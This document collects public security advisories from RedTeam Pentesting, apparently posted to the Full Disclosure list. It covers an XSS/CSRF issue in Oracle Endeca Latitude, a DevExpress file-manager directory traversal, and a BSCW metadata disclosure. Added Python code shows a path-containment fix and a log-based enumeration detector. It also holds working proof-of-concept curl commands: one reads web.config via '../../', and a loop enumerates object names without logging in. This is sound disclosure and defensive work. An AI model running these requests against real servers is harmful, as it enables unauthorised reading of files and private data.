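        if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
            return 403, "missing or invalid CSRF token"
        STATE_CHANGING_OPS[op](state)
        return 200, f"operation {op} performed"
    # XSS fix: the unsupported value is reflected only after escaping, so
    # <script> reaches the browser as the harmless text &lt;script&gt;.
    return 400, f"unsupported operation: {html.escape(op, quote=True)}"
```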

Workaround
==

The vendor did not update the vulnerable software, but recommends
configuring all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Fix
===

Not available. The vendor did not update the vulnerable software to
remedy this issue.


Security Risk
=

The vulnerability can be used to embed arbitrary JavaScript code and
therefore offers a wide range of possible attacks such as stealing
cookies or displaying a fake login form. Furthermore, an attacker can use
this vulnerability to control the Endeca Latitude instance by using the
API implemented by its web service (see [2]). The risk of this
vulnerability is therefore considered to be high.


Timeline
========

2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
   CPU
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released



References
==

[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/src/cadm_url_about_admin_urls.html
[2] http://docs.oracle.com/cd/E29220_01/index.htm


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer:                          Patrick Hof, Jens Liebchen



___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager

2014-06-05 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in DevExpress ASP.NET File Manager

During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.

Details
===

Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL: https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575


Introduction
============

The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application.

(from DevExpress' Homepage)


More Details
============

The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.

A common request to download a file via the File Manager component
requires multiple HTTP POST parameters:

__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7Cfile.ext
__EVENTVALID=

The parameter __EVENTARGUMENT=13|file.ext specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.


Proof of Concept
================

By requesting files with a relative path, files otherwise not available
become accessible through the File Manager component. Depending on the
shared directory and the webserver configuration, the webserver
configuration file might, for example, be accessible through the File
Manager component:

__EVENTARGUMENT=13|../../web.config

Other sensitive operating system files could be affected, too.

Example exploit:

curl --data "__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
&__EVENTARGUMENT=13%7C../../web.config&__EVENTVALID=" \
  http://example.com/FileManagerComponent.aspx


The request above will download the specified file.

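The vendor's fix in v13.2.9 is not reproduced on this page; as an added example (not DevExpress code), the following Python shows the containment check a file download handler of this kind needs: the __EVENTARGUMENT value `13|<path>` (raw or %-encoded) is parsed, the path is resolved against the shared root with realpath, and anything that leaves that root is refused. The directory layout is constructed in a temporary directory; the function and exception names are assumptions.

```python
import os
import tempfile
from urllib.parse import unquote

DOWNLOAD_COMMAND = "13"  # command code used for downloads in the advisory


class PathOutsideShare(Exception):
    """Raised when the requested file lies outside the shared directory."""


def resolve_download(shared_root, event_argument):
    """Turn a __EVENTARGUMENT value '13|<path>' (raw or %-encoded) into an
    absolute path, refusing anything that escapes shared_root."""
    command, sep, requested = unquote(event_argument).partition("|")
    if not sep or command != DOWNLOAD_COMMAND:
        raise ValueError("not a download request")
    # Absolute paths, Windows-style roots and NUL bytes are never legitimate
    # for a path that is meant to be relative to the share.
    if "\x00" in requested or os.path.isabs(requested) or requested[:1] in ("/", "\\"):
        raise PathOutsideShare(requested)
    root = os.path.realpath(shared_root)
    # realpath collapses '..' segments and follows symlinks, so the check
    # below sees the location the open() would actually hit.
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PathOutsideShare(requested)
    return candidate


def demo():
    """Constructed layout: <tmp>/app/web.config beside <tmp>/app/share/file.ext.
    Returns each request mapped to its <tmp>-relative result or 'REJECTED'."""
    base = os.path.realpath(tempfile.mkdtemp())
    share = os.path.join(base, "app", "share")
    os.makedirs(share)
    for name in ("app/web.config", "app/share/file.ext"):
        open(os.path.join(base, *name.split("/")), "w").close()
    results = {}
    for arg in ("13|file.ext", "13|sub/../file.ext",
                "13%7C../web.config", "13|../../app/web.config"):
        try:
            path = resolve_download(share, arg)
            results[arg] = os.path.relpath(path, base).replace(os.sep, "/")
        except PathOutsideShare:
            results[arg] = "REJECTED"
    return results
```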

Workaround
==

Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.


Fix
===

Update ASPxFileManager control to DevExpress libraries version v13.2.9.


Security Risk
=

The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.


Timeline
========

2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released


References
==

Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer:                          Patrick Hof, Jens Liebchen



[FD] [RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW

2014-05-08 Thread RedTeam Pentesting GmbH
Advisory: Metadata Information Disclosure in OrbiTeam BSCW

RedTeam Pentesting discovered an information disclosure vulnerability in
OrbiTeam's BSCW collaboration software. An unauthenticated attacker can
disclose metadata about internal objects which are stored in BSCW.


Details
===

Product: BSCW
Affected Versions: BSCW <= 5.0.7
Fixed Versions: BSCW >= 5.0.8
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://www.bscw.de/english/product.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003
Advisory Status: published
CVE: CVE-2014-2301
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301


Introduction
============

The BSCW shared workspace system is the tool of choice for efficient
group collaboration. BSCW permits the creation of documents,
appointments, contacts, tasks and notes within shared workspaces.
Without having to install additional software, team members can access
this data around-the-clock, from anywhere in the world. Mission-critical
information is constantly available to all authorised personnel
regardless of location, ensuring that complex workflows can be
coordinated with minimal effort.

(from OrbiTeam's homepage)


More Details
============

BSCW uses the URL parameter op to select different functions of the
application. For example, the password reset dialog can be opened via
the following URL:

https://www.example.com/pub/bscw.cgi/?op=chpwd

The server maps the value of the parameter op to locally stored Python
modules, which provide handler functions that are called to generate
HTTP responses. It was discovered that sensitive metadata about
internally stored BSCW objects can be disclosed by using the inf
operation.

When the following URL is opened, the filename of the document
identified by the value 12345 is disclosed in the response sent by the
server (output shortened):

$ curl --header 'Cookie: _pub_bscws=e4efb9e7ace7a12de82aa7a4aff1ab2a:1' \
    'http://www.example.com/pub/bscw.cgi/12345?op=inf'
[...]
<table summary="" class="iTab" border="0" cellspacing="1" cellpadding="4"
width="440">
<tr valign="top">
  <td class="iLabel" id="small" width="88">Name</td>
  <td class="iValueB" width="352">Contract-X.doc</td>
</tr>
</table>
[...]

The cookie used in the above command is generated by requesting the
login page of BSCW. It is not necessary to enter credentials.

By iterating over the IDs, which are assigned in ascending order,
attackers can enumerate the names of all objects stored in BSCW without
prior authentication. This includes filenames and email addresses.


Proof of Concept
================

When the following loop is run with a valid (but unauthenticated) BSCW
cookie, it prints the names of the BSCW objects 1 to 3:

$ for id in `seq 1 3`; do
    # fetch the object's info page and cut the "Name" cell out of the HTML
    filename=`curl --silent --header 'Cookie: _pub_bscws=COOKIE_COOKIE_COOKIE' \
        "http://www.example.com/pub/bscw.cgi/${id}?op=inf" | \
        grep iValueB | \
        sed -e 's;^.*<td class="iValueB" width="352">\(.*\)</td>.*$;\1;'`
    echo "${id}: ${filename}"
done

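Enumeration of this kind leaves a recognisable trace in the web server's access log: one client fetching many object IDs with op=inf, in ascending order. As an added example (not part of the advisory or of BSCW), the following Python scans constructed Apache-style log lines for exactly that pattern; the log format, client addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Apache-style access log line (assumed format); only the fields we need.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# BSCW object request using the inf operation, e.g. /pub/bscw.cgi/12345?op=inf
INF_RE = re.compile(r'^/pub/bscw\.cgi/(?P<oid>\d+)\?(?:.*&)?op=inf(?:&|$)')


def longest_ascending_run(ids):
    """Length of the longest run of directly consecutive object ids."""
    best = run = 1 if ids else 0
    for prev, cur in zip(ids, ids[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def find_enumerators(lines, min_requests=5, min_run=5):
    """Return {client: summary} for clients whose successful op=inf
    requests look like a sequential sweep over object ids."""
    by_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        p = INF_RE.match(m["path"])
        if p:
            by_client[m["client"]].append(int(p["oid"]))
    flagged = {}
    for client, ids in by_client.items():
        run = longest_ascending_run(ids)
        if len(ids) >= min_requests and run >= min_run:
            flagged[client] = {"requests": len(ids), "longest_run": run,
                               "id_range": (min(ids), max(ids))}
    return flagged


def _line(client, sec, path, status="200"):
    """Build one constructed access-log line."""
    return f'{client} - - [20/Feb/2014:10:00:{sec:02d} +0100] "GET {path} HTTP/1.1" {status} 4312'


# Constructed sample: 10.0.0.5 sweeps ids 1..8, 10.0.0.9 is an ordinary user.
SAMPLE_LOG = [_line("10.0.0.5", i, f"/pub/bscw.cgi/{i}?op=inf") for i in range(1, 9)] + [
    _line("10.0.0.9", 30, "/pub/bscw.cgi/12345?op=inf"),
    _line("10.0.0.9", 31, "/pub/bscw.cgi/771?op=inf"),
    _line("10.0.0.9", 32, "/pub/bscw.cgi/?op=chpwd"),
]
```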

Workaround
==

It may be possible to add another authentication layer, for example
HTTP-Authentication, to limit access to this BSCW information disclosure
to persons authorized to use BSCW anyway.


Fix
===

Update to version 5.0.8.


Security Risk
=

The risk is estimated to be medium. This vulnerability does not allow
attackers to access files stored in BSCW. They can however retrieve
filenames, which may be enough to draw conclusions about the
corresponding file contents, and other potentially sensitive data such
as email addresses.


Timeline
========

2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-04-22 Vendor released fixed version
2014-05-08 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer:                          Patrick Hof, Jens Liebchen

